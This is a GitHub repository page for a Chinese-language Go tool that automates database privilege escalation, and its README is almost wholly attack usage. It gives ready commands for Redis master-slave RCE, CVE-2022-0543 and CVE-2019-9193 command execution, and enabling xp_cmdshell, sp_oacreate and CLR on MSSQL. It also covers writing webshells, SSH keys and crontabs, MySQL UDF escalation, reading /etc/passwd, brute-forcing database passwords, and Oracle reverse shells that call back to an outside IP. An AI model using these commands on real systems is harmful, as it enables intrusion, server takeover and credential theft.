Skip to content
/ Databasetools Public

一款用Go语言编写的数据库自动化提权工具,支持Mysql、MSSQL、Postgresql、Oracle、Redis数据库提权、命令执行、爆破以及ssh连接

849 stars 97 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Hel10-Web/Databasetools

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
driver
driver
 
 
pac
pac
 
 
shell
shell
 
 
.gitattributes
.gitattributes
 
 
crontab.txt
crontab.txt
 
 
exp.dll
exp.dll
 
 
exp.so
exp.so
 
 
go.mod
go.mod
 
 
go.sum
go.sum
 
 
main.go
main.go
 
 
out.json
out.json
 
 
readme.md
readme.md
 
 
shell.txt
shell.txt
 
 
ssh.txt
ssh.txt
 
 

Repository files navigation

Redis

连接redis获取sql shell

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -cli

image.png

主从复制RCE

//Linux
go run .\main.go -redis  -rhost 192.168.111.211  -lhost 192.168.1.110 -exec -so exp.so
go run .\main.go -redis  -rhost 192.168.111.211  -lhost 192.168.1.110 -exec -console -so exp.so

image.png

Lua沙盒绕过命令执行(CVE-2022-0543)

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -lua -console

image.png

写公钥

将ssh.txt文件中公钥替换成自己生成的

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -sshkey

写Webshell

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -shell

image.png

定时任务

需要修改crontab.txt内容

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -crontab

MSSQL

连接数据库并获取一个sql shell

go run .\main.go -mssql -rhost 192.168.111.223 -rport 1433 -ruser sa -pwd "1qaz@WSX"  -cli

image.png

开启xp_cmdshell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isxp

image.png

xp_cmdshell获取一个执行系统命令的shell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isxp -console

image.png

xp_cmdshell执行单条系统命令

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX"  -isxp -docmd -cmd "whoami"

image.png

开启sp_oacreate

go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -issp

image.png

sp_oacreate获取一个执行系统命令的shell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -issp -console

image.png

sp_oacreate执行单条系统命令

go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX"  -issp -docmd -cmd "whoami"

image.png

CLR获取一个执行系统命令的shell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isclr -console

image.png

CLR执行单条系统命令

go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX"  -isclr -docmd -cmd "whoami"

image.png

log备份写getshell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -shell -logshell -path "C:\phpStudy\WWW\aa.php" -e 'php'

image.png

差异备份getshell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -difshell -path "C:\phpStudy\WWW\shell.php" -e 'php'

image.png

SSH连接

go run .\main.go -ssh -ruser root -rhost 192.168.111.139 -pwd "1qaz@WSX"

image.png

Mysql

连接获取sql shell

go run .\main.go -mysql -ruser root -rhost 192.168.111.134 -pwd "root" -rport 3306 -cli

image.png

into out file获取webshell

go run .\main.go -mysql -ruser root -rhost 192.168.111.136 -pwd "root" -rport 3306 -shell -outfileshell -path "C:\\\\phpStudy\\\\WWW\\\\\aaa.php"

image.png

全局日志getshell

go run .\main.go -mysql -ruser root -rhost 192.168.111.136 -pwd "root" -rport 3306 -shell -generallog -path C:\\\\phpStudy\\\\WWW\\\\aam.php

image.png

udf提权

go run .\main.go -mysql -ruser root -rhost 192.168.111.136 -pwd "root" -rport 3306 -udf

image.png

postgresql

连接postgre数据库获取sql shell

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.162 -rport "5432" -cli

image.png

利用CVE-2019-9193循环执行命令

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -CVE20199193 -console

image.png

利用CVE-2019-9193执行单条命令

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -CVE20199193 -cmd "pwd"

image.png

单次文件读取(方法一)

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read1 -file "/etc/passwd"

image.png

循环文件读取(方法一)

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read1 -console

image.png

单次文件读取(方法二)

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read2 -file "/etc/passwd"

把hex值转换string即为结果 image.png

循环文件读取(方法二)

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read2 -console

image.png

列目录

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -list -file "./"

image.png

循环列目录

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -list -console

image.png

上传webshell

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -write -uploadpath "/tmp/shell.jsp" -e "jsp"

image.png

Oracle

使用之前需要安装oracle客户端 Windows下安装方法 解压下载的instantclient_21_8压缩包,将解压路径添加到系统变量path image.png Linux下正常支持Redis、Mysql、SQL Server、Postgresql,如想使用Oracle功能需要安装Oracle客户端驱动。在Kali下所有功能可完美运行

获取sql shell

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser test -pwd "1qaz@WSX" -sid helowin -cli

image.png

DBMS_Export_Extention循环执行命令

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dee -console

image.png

DBMS_Export_Extention执行单条命令

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dee -docmd -cmd "whoami"

image.png

DBMS_Export_Extention反弹shell

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -lhost 175.178.233.198 -lport 7776 -dee -re

image.png image.png

DBMS_XMLQUERY循环执行系统命令

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dx -console

image.png

DBMS_XMLQUERY执行单条系统命令

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dx -docmd -cmd "whoami"

image.png

卸载命令执行函数

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -del

image.png

dbms_java_test.funcall反弹shell

 go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -lhost 175.178.233.198 -lport 7776 -fc

image.png image.png

爆破数据库账号密码

Mysql

go run .\main.go -rhost 192.168.111.206 -rport 3306 -crack -m mysql

image.png

MSSQL

go run .\main.go -rhost 192.168.111.223 -rport 1433 -crack -m mssql

image.png

Postgresql

go run .\main.go -rhost 192.168.111.211 -rport 5432 -crack -m postgresql

image.png

Redis

go run .\main.go -rhost 192.168.111.211 -rport 6379 -crack -m redis

image.png

Oracle

go run .\main.go -rhost 192.168.111.211 -rport 1521 -crack -m oracle

image.png

About

一款用Go语言编写的数据库自动化提权工具,支持Mysql、MSSQL、Postgresql、Oracle、Redis数据库提权、命令执行、爆破以及ssh连接

Resources

Readme
Activity

Stars

849 stars

Watchers

8 watching

Forks

97 forks
Report repository

Releases 2

Databasetools 1.2版本 Latest
Feb 19, 2023
+ 1 release

Packages

No packages published

Languages